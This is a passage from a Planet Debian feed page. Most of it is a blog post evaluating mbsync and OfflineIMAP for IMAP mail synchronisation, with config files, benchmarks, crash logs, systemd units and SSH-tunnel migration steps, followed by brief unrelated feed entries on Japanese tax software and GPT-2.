I started with this .mbsyncrc configuration file:

SyncState *
Sync New ReNew Flags

IMAPAccount anarcat
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt

IMAPStore anarcat-remote
Account anarcat

MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir-mbsync/

Channel anarcat
# AKA Far, convert when all clients are 1.4+
Master :anarcat-remote:
# AKA Near
Slave :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
Patterns *
# Automatically create missing mailboxes, both locally and on the server
#Create Both
Create slave
# Sync the movement of messages between folders and deletions, add after making sure the sync works
#Expunge Both

Long gone are the days where I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of a "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian package ships one in /usr/share/doc/isync/examples/mbsyncrc.sample but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax.

Also, that syntax is a little overly complicated. For example, Far needs colons, like:

Far :anarcat-remote:

Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global.

Using a more standard format like .INI or TOML could improve that situation.

Stellar performance

A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive.

It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync.

The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:

===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.015       0.052       1.930       2.029       2.105
user        0.660       0.040       0.592       0.661       0.722
sys         0.338       0.033       0.268       0.341       0.387

Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m.

Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:

120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k
29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps

That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:

===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.500       0.087       2.340       2.491       2.629
user        0.718       0.037       0.679       0.711       0.793
sys         0.322       0.024       0.284       0.320       0.365

Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There, mbsync is worse than the SMD baseline:

===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        31.531      0.724       30.764      31.271      33.100
user        1.858       0.125       1.721      1.818       2.131
sys         0.610       0.063       0.506       0.600       0.695

That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface

Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:

anarcat@angela:~(main)$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 1/2  B: 204/205  F: +0/0 *0/0 #0/0  N: +1/200 *0/0 #0/0

(Note that nice switch away from slavery-related terms too.)

The display is minimal, yet informative. It's not obvious what it means at first glance, but the manpage is useful at least for clarifying that:

This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).

In other words:

  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted

You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary of mail traffic in the logs.

Interoperability issue

In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:

notmuch search --output=files --format=text0 "$search_spam" \
    | xargs -r -0 mv -t "$HOME/Maildir/${PREFIX}junk/cur/"

This method, which worked fine in SMD (and also OfflineIMAP) created this error on sync:

Maildir error: duplicate UID 37578.

And indeed, there are now two messages with that UID in the mailbox:

anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*'
Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S
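To check whether other UIDs collide in the same folder, a quick pipeline (a sketch, assuming mbsync's ",U=&lt;uid&gt;" filename convention shown above) can list every UID that appears more than once:

```shell
# List UIDs that occur more than once in a Maildir folder,
# based on the ",U=<uid>" marker mbsync adds to filenames.
find Maildir/.junk -type f -name '*,U=*' \
    | sed 's/.*,U=\([0-9]*\).*/\1/' \
    | sort | uniq -d
```

On the spool above, this would print 37578, the duplicated UID.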

This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":

When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir folders. Mutt always does that, while mu4e needs to be configured to do it:

(setq mu4e-change-filenames-when-moving t)

So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above.

Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like.

(A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.)
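That manual fix might look like the following sketch; the filename is the duplicate listed above, and the sed expression simply drops the ",U=&lt;uid&gt;" marker:

```shell
# Strip the ",U=<uid>" marker from one of the duplicates so that
# mbsync assigns a fresh UID on the next sync.
f='Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S'
mv -- "$f" "$(printf '%s\n' "$f" | sed 's/,U=[0-9]*//')"
```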

Stability issues

The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which led to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect.

The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more.

Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it...

Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues.

Automation with systemd

The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages.

I have used the following .service file:

[Unit]
Description=Mailbox synchronization service
ConditionHost=!marcos
Wants=network-online.target
After=network-online.target
Before=notmuch-new.service

[Service]
Type=oneshot
ExecStart=/usr/bin/mbsync -a
Nice=10
IOSchedulingClass=idle
NoNewPrivileges=true

[Install]
WantedBy=default.target

And the following .timer:

[Unit]
Description=Mailbox synchronization timer
ConditionHost=!marcos

[Timer]
OnBootSec=2m
OnUnitActiveSec=5m
Unit=mbsync.service

[Install]
WantedBy=timers.target

Note that we trigger notmuch through systemd, with the Before and also by adding mbsync.service to the notmuch-new.service file:

[Unit]
Description=notmuch new
After=mbsync.service

[Service]
Type=oneshot
Nice=10
ExecStart=/usr/bin/notmuch new

[Install]
WantedBy=mbsync.service

An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover for the "sent folder" use case, where we need to wake up on local changes.

Password-less setup

The sample file suggests this should work:

IMAPStore remote
Tunnel "ssh -q host.remote.com /usr/sbin/imapd"

Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:

IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"

And it actually seems to work:

$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 0/2  B: 0/1  F: +0/0 *0/0 #0/0  N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied
C: 2/2  B: 205/205  F: +0/0 *0/0 #0/0  N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087

It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well?

Interestingly, the SSH setup is not faster than IMAP.

With IMAP:

===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.367       0.065       2.220       2.376       2.458
user        0.793       0.047       0.731       0.776       0.871
sys         0.426       0.040       0.364       0.434       0.476

With SSH:

===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.515       0.088       2.274       2.532       2.594
user        0.753       0.043       0.645       0.766       0.804
sys         0.328       0.045       0.212       0.340       0.393

Basically: 200ms slower. Tolerable.

Migrating from SMD

The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:

  1. install isync, with the patch:

    dpkg -i isync_1.4.3-1.1~_amd64.deb
  2. copy all files over from previous workstation to avoid a full resync (optional):

    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
  3. rename all files to match new hostname (optional):

    find Maildir-mbsync/ -type f -name '*.angela,*' -print0 | rename -0 's/\.angela,/\.curie,/'
  4. trash the notmuch database (optional):

    rm -rf Maildir-mbsync/.notmuch/xapian/
  5. disable all smd and notmuch services:

    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
  6. do one last sync with smd:

    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
  7. backup notmuch on the client and server:

    notmuch dump | pv > notmuch.dump
  8. backup the maildir on the client and server:

    cp -al Maildir Maildir-bak
  9. create the SSH key:

    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync
    cat .ssh/id_ed25519_mbsync.pub
  10. add to .ssh/authorized_keys on the server, like this:

    command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...

  11. move old files aside, if present:

    mv Maildir Maildir-smd
  12. move new files in place (CRITICAL SECTION BEGINS!):

    mv Maildir-mbsync Maildir
  13. run a test sync, only pulling changes:

    mbsync --create-near --remove-none --expunge-none --noop anarcat-register

  14. if that works well, try with all mailboxes:

    mbsync --create-near --remove-none --expunge-none --noop -a

  15. if that works well, try again with a full sync:

    mbsync register
    mbsync -a

  16. reindex and restore the notmuch database, this should take ~25 minutes:

    notmuch new
    pv notmuch.dump | notmuch restore
  17. enable the systemd services and retire the smd-* services:

    systemctl --user enable mbsync.timer notmuch-new.service
    systemctl --user start mbsync.timer
    rm ~/.config/systemd/user/smd*
    systemctl daemon-reload

During the migration, notmuch helpfully told me the full list of those lost messages:

[...]
Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com
Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com
Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com
[...]
Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org
Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org
Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47
Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d
Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d
Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c
Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562
Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13
[...]

As detailed in the crash report, all of those were actually innocuous and could be ignored.

Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:

nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.).
nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.

While a reindexing on top of an existing database was going twice as slow, at about 120 files/sec.

Current config file

Putting it all together, I ended up with the following configuration file:

SyncState *
Sync All

# IMAP side, AKA "Far"
IMAPAccount anarcat-imap
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt

IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"

IMAPStore anarcat-remote
Account anarcat-tunnel

# Maildir side, AKA "Near"
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir/

# what binds Maildir and IMAP
Channel anarcat
Far :anarcat-remote:
Near :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
#Patterns *
Patterns * !register !.register
# Automatically create missing mailboxes, both locally and on the server
Create Both
#Create Near
# Sync the movement of messages between folders and deletions, add after making sure the sync works
Expunge Both
# Propagate mailbox deletion
Remove both

IMAPAccount anarcat-register-imap
Host imap.anarc.at
User register
PassCmd "pass imap.anarc.at-register"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt

IMAPAccount anarcat-register-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap"

IMAPStore anarcat-register-remote
Account anarcat-register-tunnel

MaildirStore anarcat-register-local
SubFolders Maildir++
Inbox ~/Maildir/.register/

Channel anarcat-register
Far :anarcat-register-remote:
Near :anarcat-register-local:
Create Both
Expunge Both
Remove both

Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP

I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that.

It also kind of died in a fire when Python 2 stop being maintained. The main author moved on to a different project, imapfw which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync

The first thing that happened on a full sync is this crash:

Copy message from RemoteAnarcat:junk:
 ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Thread 'Copy message from RemoteAnarcat:junk' terminated with exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode
    for c in binary.decode():
AttributeError: 'memoryview' object has no attribute 'decode'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run
    Thread.run(self)
  File "/usr/lib/python3.9/threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')

Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception:
thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat')
ERROR: Exceptions occurred during the run!
ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')

Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
Folder junk [acc: Anarcat]:
 Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk
Command exited with non-zero status 100
5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k
96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps

That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance

The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:

*** Finished account 'Anarcat' in 511:12
ERROR: Exceptions occurred during the run!
ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes).
 AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(

ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes).
 AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(

ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686'
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap
    raise OfflineImapError(reason, severity)

Command exited with non-zero status 1
8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k
56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps
"offlineimap -o " took 8 hours 31 mins 15 secs

This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude!
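That rate can be sanity-checked with a few lines of arithmetic (assuming "12G" means decimal gigabytes; with binary GiB the figure comes out closer to 3.4 Mbit/s):

```python
# Back-of-the-envelope check of the quoted sync throughput.
# Assumption: "12G" = 12 * 10**9 bytes (decimal gigabytes).
size_bits = 12 * 10**9 * 8
elapsed_seconds = 8 * 3600 + 31 * 60 + 12  # the 8:31:12 elapsed time from the log
rate_mbit = size_bits / elapsed_seconds / 10**6
print(round(rate_mbit, 1))  # → 3.1
```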

Now that we have a full sync, we can test incremental synchronization. That is also much slower:

===> multitime results
1: sh -c "offlineimap -o || true"
            Mean        Std.Dev.    Min         Median      Max
real        24.639      0.513       23.946      24.526      25.708
user        23.912      0.473       23.404      23.795      24.947
sys         1.743       0.105       1.607       1.729       2.002

That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check

That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I haven't tested that theory.

The OfflineIMAP mail spool is missing quite a few messages as well:

anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*' | wc -l
381463
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
385247

... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate

Those are all the options I have considered, in alphabetical order:

  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox, NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc. Discarded because of no (real) support for keeping mail on the server, and written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. not evaluated because it seems awfully complex to setup
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above

Most projects were not evaluated due to lack of time.

Conclusion

I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's on par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response.

Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have run out of time on this project.

Categories: FLOSS Project Planets

Junichi Uekawa: Tax related software.

Planet Debian - Sun, 2021-11-21 02:40
Tax related software. Tax related work in Japan is defined to be exclusive to licensed Tax Accountants. I wondered what that means for tax related software, and I was uncomfortable about what it would mean to make one, or even whether I could be fined for doing so. I looked it up, and the national tax agency has a FAQ entry, 2 非税理士により行うことが禁止される税理士業務 ("Tax accountant services that non-Tax Accountants are prohibited from performing"), which states that making and selling software for tax filing is allowed for non-Tax Accountants. So if they say so, maybe it's safe for me to write and distribute tax related software. One caveat is that tax software is only applicable in individual countries, but since it's something I care about and use every year, it's probably ok.


John Ludhi/nbshare.io: Movie Name Generation Using GPT-2

Planet Python - Sat, 2021-11-20 20:38

Movie Name Generation Using GPT-2

